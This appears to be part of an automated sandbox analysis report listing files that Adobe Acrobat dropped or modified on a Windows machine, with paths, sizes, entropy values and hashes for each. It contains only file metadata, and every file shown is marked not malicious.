Size (bytes): | 16384 |
Entropy (8bit): | 0.0772741883711845 |
Encrypted: | false |
SSDEEP: | 3:ZLW8Yelq5Cjn13a/bJIfkhillcVO/lnlZMxZNQl:ZLW8zlT53q+fkhGOewk |
MD5: | 21AD739BBB2BB9FBF89CF398D499F7ED |
SHA1: | 33CEB19D72B618464A2026473F5B0DDE6FF717BD |
SHA-256: | E2189592F4DFEA46C76A943198CD6B3AA2A368E84A61BF663752DF7CD256DDD5 |
SHA-512: | 7173AB1A619B91D3D71F229ADBE2F1B4DCE3854A30DA163F22C254DFF3318FF9C53C4949A74EAE797BA96FDA59E395FF6A5C0E2CF15E415F0FDA159591E77BC4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.193031327790522 |
Encrypted: | false |
SSDEEP: | 6:iO4O3+q2Pwkn2nKuAl9OmbnIFUtSjZmwsTVkwOwkn2nKuAl9OmbjLJ:7svYfHAahFUtG/g5JfHAaSJ |
MD5: | 6A66531CFA1603B6149CDD7DFAAD9DE3 |
SHA1: | 4F257DA9403D616E6343CCF51FA2D0EE8A710AD6 |
SHA-256: | 0F610741A9633533249615F1925322D250D4651A880820B5B1DF674C8E83E625 |
SHA-512: | 189135F9800E94FF090203B84087A920BF02A02DB62DC3CA33AA9E52453421243F42BC05B69B23685F9F043577D1674A037D5EDB9F8E2FFE02C731E1C64531AB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.193031327790522 |
Encrypted: | false |
SSDEEP: | 6:iO4O3+q2Pwkn2nKuAl9OmbnIFUtSjZmwsTVkwOwkn2nKuAl9OmbjLJ:7svYfHAahFUtG/g5JfHAaSJ |
MD5: | 6A66531CFA1603B6149CDD7DFAAD9DE3 |
SHA1: | 4F257DA9403D616E6343CCF51FA2D0EE8A710AD6 |
SHA-256: | 0F610741A9633533249615F1925322D250D4651A880820B5B1DF674C8E83E625 |
SHA-512: | 189135F9800E94FF090203B84087A920BF02A02DB62DC3CA33AA9E52453421243F42BC05B69B23685F9F043577D1674A037D5EDB9F8E2FFE02C731E1C64531AB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.168702553381561 |
Encrypted: | false |
SSDEEP: | 6:iO4N0yq2Pwkn2nKuAl9Ombzo2jMGIFUtSNli1ZmwsNtRkwOwkn2nKuAl9Ombzo23:7g0yvYfHAa8uFUtGe/UtR5JfHAa8RJ |
MD5: | 33DB1C108D8EEA438F5436FD49644049 |
SHA1: | 150482E481CC9B85BFFD6CCC1E7061F8E5F3CED2 |
SHA-256: | F4ACF92F68080261B89329E78334B6D70A671FD8450CFFE0992B431841D6A465 |
SHA-512: | 90FF49CE8E137BFCD48CB168A65DDEF6242A107CAA009B43C7330B5C2516E2878CB756E23ED30B9921ECA3738CC80412F5A93F4222C27C143724ACF32165694D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.168702553381561 |
Encrypted: | false |
SSDEEP: | 6:iO4N0yq2Pwkn2nKuAl9Ombzo2jMGIFUtSNli1ZmwsNtRkwOwkn2nKuAl9Ombzo23:7g0yvYfHAa8uFUtGe/UtR5JfHAa8RJ |
MD5: | 33DB1C108D8EEA438F5436FD49644049 |
SHA1: | 150482E481CC9B85BFFD6CCC1E7061F8E5F3CED2 |
SHA-256: | F4ACF92F68080261B89329E78334B6D70A671FD8450CFFE0992B431841D6A465 |
SHA-512: | 90FF49CE8E137BFCD48CB168A65DDEF6242A107CAA009B43C7330B5C2516E2878CB756E23ED30B9921ECA3738CC80412F5A93F4222C27C143724ACF32165694D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\1ec40cc4-ae65-4859-8be2-78026a0e52fb.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.97063671378777 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq3sBdOg2HGcaq3QYiubInP7E4T3y:Y2sRdsldMH53QYhbG7nby |
MD5: | 4669387A67E85FC57D1D79623A4E3F55 |
SHA1: | 7442C3A793FCF1FA6F56AE8C1233798B1921859F |
SHA-256: | 03958F1E841CBB2E99FFDE4328D5FBD30DADCFC20F199E92EF60D96FF76F58D0 |
SHA-512: | 7B51219D2CADB51C02AE9431B87EF568CD7F58D623B6629BDF4400FB94502CCED00C7B6BEABAA7D422036BE4D0CE37FDD4AD0087AFE0CD727B3C0AF654746601 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.97063671378777 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq3sBdOg2HGcaq3QYiubInP7E4T3y:Y2sRdsldMH53QYhbG7nby |
MD5: | 4669387A67E85FC57D1D79623A4E3F55 |
SHA1: | 7442C3A793FCF1FA6F56AE8C1233798B1921859F |
SHA-256: | 03958F1E841CBB2E99FFDE4328D5FBD30DADCFC20F199E92EF60D96FF76F58D0 |
SHA-512: | 7B51219D2CADB51C02AE9431B87EF568CD7F58D623B6629BDF4400FB94502CCED00C7B6BEABAA7D422036BE4D0CE37FDD4AD0087AFE0CD727B3C0AF654746601 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.253649319478969 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7AzYyW:etJCV4FiN/jTN/2r8Mta02fEhgO73go/ |
MD5: | 1EEB805896EB9BF56E1AC8C07C15060C |
SHA1: | 80746BC6038CA3C7DE210979684F1FF8303703B7 |
SHA-256: | 933B20B10AA8AD3016B4AB53281144DD8A68411384FD1548D4439C0C79BD4A06 |
SHA-512: | E1510B2877A6FB9A921AAD7CD14811BC0925FF6A2CE4434867076F2E8267B6FEAD3D0CF1D598CC3E0ADD11D3D5859D50FE1819FAD39DE552E2B7A68ED7AF8CF1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.133898989071376 |
Encrypted: | false |
SSDEEP: | 6:iO4yByq2Pwkn2nKuAl9OmbzNMxIFUtSRMi1Zmws8RkwOwkn2nKuAl9OmbzNMFLJ:7TyvYfHAa8jFUtC7/PR5JfHAa84J |
MD5: | 7AE1A62D4EA285B3BB51A8B654B717A1 |
SHA1: | 837827F417C26D08F62093C131F6E19F2D9AD1CE |
SHA-256: | AB01F9101091D89DC29CDE444693D810401306398835C09BA6674CCD46324CDD |
SHA-512: | F93E24ADC6CAEB907F0D407E2D9CD7E3188AB9E02EAA657A6E39ED42B5BD0CDCF12BF97F320ACE009998464F76E594F493C03779CEEF8C5A424B88CD528FFA28 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.133898989071376 |
Encrypted: | false |
SSDEEP: | 6:iO4yByq2Pwkn2nKuAl9OmbzNMxIFUtSRMi1Zmws8RkwOwkn2nKuAl9OmbzNMFLJ:7TyvYfHAa8jFUtC7/PR5JfHAa84J |
MD5: | 7AE1A62D4EA285B3BB51A8B654B717A1 |
SHA1: | 837827F417C26D08F62093C131F6E19F2D9AD1CE |
SHA-256: | AB01F9101091D89DC29CDE444693D810401306398835C09BA6674CCD46324CDD |
SHA-512: | F93E24ADC6CAEB907F0D407E2D9CD7E3188AB9E02EAA657A6E39ED42B5BD0CDCF12BF97F320ACE009998464F76E594F493C03779CEEF8C5A424B88CD528FFA28 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444871857558857 |
Encrypted: | false |
SSDEEP: | 384:SeSci5tGiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:OJs3OazzU89UTTgUL |
MD5: | 16EC5B6A3A3871964B47C2947F058D86 |
SHA1: | 8B14A1C2ABEE98BABE2448ADF926F0A3974CC541 |
SHA-256: | A8619DA50A5FF156DA05EE7F48C50214080208D40DB49A3E1148B4AF8D659B95 |
SHA-512: | F98EC8FE12F32108DAC54CA05600A63E117343E3A62C984F5B1109D4AA6B56218FB1C90029602AB8102CD8E94196BB9BA057CFA04B4C1F5A957D86E025EE650B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8720 |
Entropy (8bit): | 2.212516430080766 |
Encrypted: | false |
SSDEEP: | 24:7+tZjanuwKSqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9k:7MknCSqvmFTIF3XmHjBoGGR+jMz+Lh+ |
MD5: | BD9A6CF7CA8223203EA07E92EB2CB80F |
SHA1: | B71E963945FCCB6BCE4069E376F64E2C4480ED6B |
SHA-256: | C22E880D0FFA4DDEA6992B28DEAEC53E2E1A010B18121C78C698DC8C962C3D25 |
SHA-512: | 0A2FB43FC23D0126687BCEA5BA3E517602BBB806462C872BB1E32CD6044F40DE10A5894D9E32209816D5B7B30D8FFDB14DBC9D4E9A394B74F8AE0EADB80BE5A4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.731398464046725 |
Encrypted: | false |
SSDEEP: | 3:kkFklDUuaM/tfllXlE/HT8k5+l7ttNNX8RolJuRdxLlGB9lQRYwpDdt:kKfuneT8w+htTNMa8RdWBwRd |
MD5: | 32BFC29B5D13F6A98862A3C54F315733 |
SHA1: | 5324AD82439DA211398E2C5C120162DA656F85F1 |
SHA-256: | 890C0BFC48060165656DDC3F974E550738B5C5603F91025E9BE86D4A03F40A0C |
SHA-512: | 98A1D99743D06CAC234F0A1E49E2595AB7C8DDDAFE6A0065ABEC238DB925A860352078B2894D5478722E7A7F24A6F8DC166516351AA1514B8844C4A4247A1B6F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.367278684980135 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJM3g98kUwPeUkwRe9:YvXKXDLV9LSZc0vxVVGMbLUkee9 |
MD5: | 43C98CB92E1EA1AAC8578F11C0351600 |
SHA1: | DC476D6D91369419BDCADB1697D0FC70B84C5EFF |
SHA-256: | C3930D8B4ABBBE9519CF57FABDB73835BC5D45DE9DF9588C21D1577E038E9D50 |
SHA-512: | D0012E1F45C62D6B563E544AECCDA204F98ECE8D251F082918D47B433673A33D00A6B4390B3903C17D6C3824A138F9A727E180EDEE771E99A49D5B26C856265E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.315720863693692 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJfBoTfXpnrPeUkwRe9:YvXKXDLV9LSZc0vxVVGWTfXcUkee9 |
MD5: | DBAB082FE30FAD329E7C3EFEDBD9E649 |
SHA1: | C76F0CA2C655D8F6EE437C1790C52BF9DB2BF1BB |
SHA-256: | 9053F801A6D91642B8ED3931C75D0F268963ADFEBA4594740EFA2801CA0A2AFA |
SHA-512: | 46B25DDF1BB2FA5C9DC7BD38E045D672CC412912E76A847D1098EF8D42E642E5F7798F8E693086F4B8314A203270E44481B33C68EA9E2C6B68FDF8D387F885D1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.293980359051499 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJfBD2G6UpnrPeUkwRe9:YvXKXDLV9LSZc0vxVVGR22cUkee9 |
MD5: | 827BC9C98A320E134FB441F50BD934C4 |
SHA1: | 30D495877C62EFE662CD0F94E81DEE2E2A121E11 |
SHA-256: | D0A0739EF8D36AFC267D3129298C0124A06C6622CE08C266B64AED698C61078F |
SHA-512: | E9E64A5CBA1D4B8BF5E710186E3BAC624E6C3E28A7F8E759EA0E6C756392350CD7EF8DEBEE42B4CD1491CC8537D291422B319BB0784300524A71BE7811891E40 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.354426570075748 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJfPmwrPeUkwRe9:YvXKXDLV9LSZc0vxVVGH56Ukee9 |
MD5: | E018DCEC78067FA76CDED134521F5BE9 |
SHA1: | D1820DB63E1A5C0715990B032E7E616545F06789 |
SHA-256: | 4A546F8708344B79037352E9D421356F14640F252EB720E03720979FCC5CBA4F |
SHA-512: | A63438694B4544D6D986CE662397928C36F6DAF7DA99D66A1F61F9F5BE23CB7E62A90E5395A8A6677544493DF7BDE872914F40C250367938AC96F6620009E33A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.690455989204522 |
Encrypted: | false |
SSDEEP: | 24:Yv6Xmzvr6pLgE9cQx8LennAvzBvkn0RCmK8czOCCSG9A:Yv5uhgy6SAFv5Ah8cv/G9A |
MD5: | 6811384CEDCB9CCF128D157A4DAB8805 |
SHA1: | 3DEFBCAD79273F455F3A2892AA50B519EC7E3207 |
SHA-256: | FDA768C9889B549DBD588347D10ED38C60A315373AF3391B448C7615BF84F3B1 |
SHA-512: | 11271DADAFBFA1F8493D9F3EB54475B96760EBD9CB07D1331F9CE5F9BE4A97EF8C705B56821B327666B00C0B8C994075180CB159AE8BBE134E521907EA1E0838 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.302381324593162 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJf8dPeUkwRe9:YvXKXDLV9LSZc0vxVVGU8Ukee9 |
MD5: | 985E9E36802D64D51B574ADA05214379 |
SHA1: | 25F21E695001CB71EBEDB7E25D2DAB966980D1B0 |
SHA-256: | C1FEBF119C21E6E4EB1D3C9C67BCC55D75A4DBCFD61433852B1B5A5F4E37AD7E |
SHA-512: | 71482C668BBACB560DC34BD087A23A105A34D20BCBE737618A18038CCE4A0C166521CF8041AABC89FB3DB0A716F6067B44FF9445FF2CE5D8BB097C3C45F6C06B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.306548293949245 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJfQ1rPeUkwRe9:YvXKXDLV9LSZc0vxVVGY16Ukee9 |
MD5: | A8A1D0187FFF867AAFAD1B797E4CF5B2 |
SHA1: | DB932C9BB3D2012C9C4701F1EF32069C1FDF9F57 |
SHA-256: | 3CEDEAF274BD0600A9B2C849D75387C3C309323189AD2D9166224ADE963A70CF |
SHA-512: | AD765F92B8782B4299E60005286D25065EB84B3329971381C33511F1D4270253268569B1D685CB4B38B1DD9E1FEFADD4AF93F1D9ABAB865DEBE7763972249E85 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.312689578392625 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJfFldPeUkwRe9:YvXKXDLV9LSZc0vxVVGz8Ukee9 |
MD5: | A79D2CB111C34B0C6A547890E1F67D3A |
SHA1: | A0346E3401A99CA8A0857B5C51C2E60641488962 |
SHA-256: | 311D8580C198224E847F829D5777B8466CE3CF56998F10BE884D6B7AAE3C7C23 |
SHA-512: | 508B485AD03FA47A2BAFB569E74EED99E356338BD5FC542F65012F1F1911364DCBCDB3E8DE2A4FC462BAA4DCB47773A2992FCF1C8EA0082F625BC4F3141AD6C0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.328139874804536 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJfzdPeUkwRe9:YvXKXDLV9LSZc0vxVVGb8Ukee9 |
MD5: | B30098D79087AEC5708EC24914AD1A4B |
SHA1: | F930323F5AB82B7ECDDDF1AFD02D5366DE152EE4 |
SHA-256: | CA05C82D3EE9A23EDB4F9E33C354FAC7E14E0FB04F55DC6716C47F638F569EF3 |
SHA-512: | ABCD0B9B390EA2E2AA7E44EA34C11D61F0373773515781171BDD89FE0ED1D44445CBE5CA04D4CEBA3A4818B355D8F5A2D20FFCD544C20DEE995CC53E7A6D9F10 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.308965823541253 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJfYdPeUkwRe9:YvXKXDLV9LSZc0vxVVGg8Ukee9 |
MD5: | A8807B685D365A17FC2823CFB13E3669 |
SHA1: | 43DC3C12E528622F0FCDC1C53C6C372EE0EF4D74 |
SHA-256: | CC78EEF0E9E201CD23CABA9995DFB7F7E0B8CB102B5E842897C2CB0840BE6330 |
SHA-512: | FB0707D37A19AD07C3B89161967308A2BB475E17BAAF2E252FC832B449656B238ADDE0E85C998EAABD19A0F640A76F4CB785A91431B7C6D23B97EA3E057A00C5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.295174045370134 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJf+dPeUkwRe9:YvXKXDLV9LSZc0vxVVG28Ukee9 |
MD5: | B1FF0B380728BF90FB66879A253996EC |
SHA1: | 47395F006A11389CF5516EFEF90E9E88ACFEF87D |
SHA-256: | 487F1F97F178CAECC4682F6078458D0586C7D8337EA65FE5B8452A0EF0EE42B0 |
SHA-512: | E58C60A65179A720132F07FE658ECFCB63FCB1F3C4B2EA1C55C21D1C7C9EA435F1E6892734C0908B25DF17BB976ED37EE9E9834EB3EDAC9C7766093665895804 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.292451300434764 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJfbPtdPeUkwRe9:YvXKXDLV9LSZc0vxVVGDV8Ukee9 |
MD5: | 636DF716AC3A1EE4F16A7C4A78677E02 |
SHA1: | 1E6469FD2A58906F3300B25CB4626D37029EE435 |
SHA-256: | 9CFDC2CBC1E6CBDE6BAC7548A521727A3B8CD95A2637E8920EB67FAEE8B08C59 |
SHA-512: | 36DB11F47879B7AEB8EAC56EAA11F5A36A5B1252DADDC0E6C0A00C870241ABAFDB427278D54B4AC2FC45B39DDE7A0B35FFA3D605043AE0FFA4BFFFF440ABCD85 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.2972268534579 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJf21rPeUkwRe9:YvXKXDLV9LSZc0vxVVG+16Ukee9 |
MD5: | 09BA9D3AB439A50882B15B58CE0FF5F1 |
SHA1: | 66614D4370DE94D998041C67AB18B6528047320C |
SHA-256: | 78407C00F26D6E22DDB28B35C4BC42058A66014E1ADDF2F1B1B17D7886C282C8 |
